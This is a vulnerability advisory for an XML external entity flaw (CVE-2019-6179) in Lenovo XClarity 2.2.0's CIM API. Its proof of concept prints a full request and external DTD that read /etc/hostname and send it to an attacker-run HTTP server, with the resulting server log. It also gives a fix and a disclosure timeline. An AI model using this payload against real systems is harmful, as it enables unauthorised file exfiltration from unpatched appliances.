usd-2019-0045 | XClarity 2.2.0


Advisory ID: usd-2019-0045
CVE Number: CVE-2019-6179
Affected Product: XClarity
Affected Version: 2.2.0
Vulnerability Type: XML External Entity Processing
Security Risk: Critical
Vendor URL: https://www.lenovo.com/
Vendor Status: Fixed
Vendor Advisory : https://support.lenovo.com/de/de/solutions/len-27805

Description

The Appliance has a CIM API listening on port 9090 that is vulnerable to XXE.

Proof of Concept (PoC)

Request:

POST /cimom HTTP/1.1
Host: 10.10.10.4:9090
Accept-Encoding: gzip, deflate
Content-type: application/xml; charset="utf-8"
Content-Length: 503
CIMOperation: MethodCall
CIMObject: root/cimv2
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE CIM [
<!ELEMENT CIM ANY >
<!ENTITY % sp SYSTEM "http://10.10.80.241/test.xml">
%sp;
%param1;
]>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0"><SIMPLEREQ>&exfil;<IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH><IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="CIM_ComputerSystem"/></IPARAMVALUE></IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>

Response:

HTTP/1.1 400 Bad Request
Content-Type: application/xml;charset="utf-8"
Content-length: 0
Connection: close

Meanwhile on the nc listener:

pentester:~/www$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.32 - - [24/May/2019 15:27:00] "GET /test.xml HTTP/1.0" 200 -
10.10.10.32 - - [24/May/2019 15:27:00] "GET /?localhost HTTP/1.0" 200 -

Content of test.xml:

<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.241/?%data;'>">

Fix

Disable external entity processing in the XML parser if possible or limit accessibility of the API to authenticated users.

Timeline

  • 2019-05-27 First contact request via psirt@lenovo.com
  • 2019-09-03 Lenovo Discloses Advisory at https://support.lenovo.com/de/de/solutions/len-27805
  • 2019-10-21 First Published

Credits

This security vulnerabilities was found by Tobias Neitzel of usd AG.